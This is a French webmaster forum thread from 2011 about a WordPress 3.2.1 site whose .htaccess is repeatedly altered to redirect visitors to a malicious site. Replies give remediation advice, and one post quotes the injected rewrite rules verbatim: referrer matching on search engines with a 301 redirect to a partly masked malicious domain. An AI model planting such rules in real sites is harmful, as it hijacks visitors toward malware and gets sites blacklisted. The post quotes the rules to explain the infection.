hacking wordpress 3.2.1 avec changement de .htacess

Consultez la formation à Google Analytics de WebRankInfo / Ranking Metrics

zen la tortue
WRInaute occasionnel
WRInaute occasionnel

hacking wordpress 3.2.1 avec changement de .htacess

Message le Dim Nov 27, 2011 11:24

bonjour,
depuis 2 jours mon .htaccess est modifié par rediriger mon site vers une site malveillant .

j'ai scanné mon site avec plusieurs antivirus en ligne tout est clean
je ne comprends pas .
Avez vous une idée ?
merci

JanoLapin
WRInaute accro
WRInaute accro

Re: hacking wordpress 3.2.1 avec changement de .htacess

Message le Dim Nov 27, 2011 11:26

vois peut-être du côté de ton hébergeur... cela ne vient peut-être pas de ton site

zen la tortue
WRInaute occasionnel
WRInaute occasionnel

Message le Dim Nov 27, 2011 11:38

JanoLapin a écrit:vois peut-être du côté de ton hébergeur... cela ne vient peut-être pas de ton site

je suis chez ovh avec un server mutualisé 720 plan

padadam22
WRInaute accro
WRInaute accro

Message le Dim Nov 27, 2011 11:42

Peu importe l'hébergeur ou le service que tu as, tu devrais les contacter pour qu'ils vérifient de leur côté ;)
La faille vient peut être d'un plugin ou du template que tu utilises.

zeb
WRInaute accro
WRInaute accro

Message le Dim Nov 27, 2011 12:02

zen la tortue a écrit:j'ai scanné mon site avec plusieurs antivirus en ligne tout est clean

Je serais curieux de savoir comment un antivirus en ligne te permet de savoir si un fichier serveur est infecté.
Si tu parle de scanner tes fichiers de site en local avec un antivirus en ligne, souvent dédié a la désinfection des PC perso, alors n'espère pas trouver un code qui est destiné a s'attaquer a un serveur web.

le-bon-plan.com
WRInaute discret
WRInaute discret

Message le Mar Nov 29, 2011 18:03

Il y a une forte probabilité que la faille provienne d'une extension Wordpress.

Fais des recherches sur le net pour vérifier si certaines extensions que tu utilises n'ont pas de pb de sécurité.

Exemple de recherche "nom extension + fail xss" ...

zeb
WRInaute accro
WRInaute accro

Message le Mar Nov 29, 2011 18:10

Et pour info sans citer personne tu n'est pas le seul sur le forum a être victime de cette bouse. La cascade de redirections qui s’enchainait par modification de htaccess tombe maintenant sur des serveurs blacklistés.

padadam22
WRInaute accro
WRInaute accro

Message le Mar Nov 29, 2011 20:40

Zeb, de quelle bouse parles-tu ?

zeb
WRInaute accro
WRInaute accro

Message le Mar Nov 29, 2011 22:34

padadam22 a écrit:Zeb, de quelle bouse parles-tu ?

J'ai eu l'occasion d'entendre parler et de voir le résultat d'un virus du genre de celui dont il est question ici c'est lui que je nome "bouse" (allusion non déguisée a une partie de la production bovine) :D

en gros voici le résultat sur un fichier htaccess :

Code: Tout sélectionner
RewriteEngine On

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)

RewriteRule ^(.*)$ -http://4ppics3tting.in/rib4/index.php [R=301,L]

dans certains cas le fichier htaccess initial est reproduit en dessous.
Comme tu peux le voir le code en question (ou celui qui le gère) produit une redirection en fonction d'où tu viens vers un domaine (j'ai un peu maquillé le NDD) qui est maintenant blacklisté.
Le dit domaine opérait une redirection chez un copain à lui qui lui injectait une page pure javascript qui en fonction d'un chiffre (ou un truc dans le genre) te renvoyait ailleurs sur un autre site.
C'est un pur détournement de trafic en fait.

La cible qui a vécu (vie encore plus ou moins ça) est maintenant listé "site dangereux" dans GG sur sa requête principale. Et si par le plus grand des hasard tu tente d'y accéder via l'url si tu la connais, Firefox te donne une page d'alerte propre a faire peur au premier lambda venu.

Bref le pauvre gars a tout perdu en trois jours et il lui reste a identifier l'entrée (si c'est pas déjà fait) et a nettoyer le site après avoir colmaté la faille (ça doit être fait puisqu'il tournait bien cet aprem).

Ensuite il devra contacter google et tous les sites de blacklistage pour dire "coucou je me suis fait hacker" mais maintenant c'est OK. Je ne te parle pas non plus de l'impact WOT possible (j'ai pas vérifié) où monsieur "Poissonard" (allusion "au bon beurre") va se lacher pour lapider le pauvre site plein de vilains virus (les plus beauf ont la gâchette facile la dessus).

padadam22
WRInaute accro
WRInaute accro

Message le Mer Nov 30, 2011 20:03

Hum... un beau bazar en somme.

zeb
WRInaute accro
WRInaute accro

Message le Mer Nov 30, 2011 20:08

ouep, autrement dit un gros mer*ier.

Architecture classique pour ce souci (je supose) : windows / compte admin / fillezila pas en SFTP

Si vous avez aimé cette discussion, partagez-la sur vos réseaux sociaux préférés :

Formation recommandée sur ce thème :

Formation Google Analytics : en 2 jours, apprenez comment exploiter l'essentiel des possibilités de l'outil de mesure d'audience de Google. Formation animée par les experts Google Analytics de Ranking Metrics.

Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.

Lectures recommandées sur ce thème :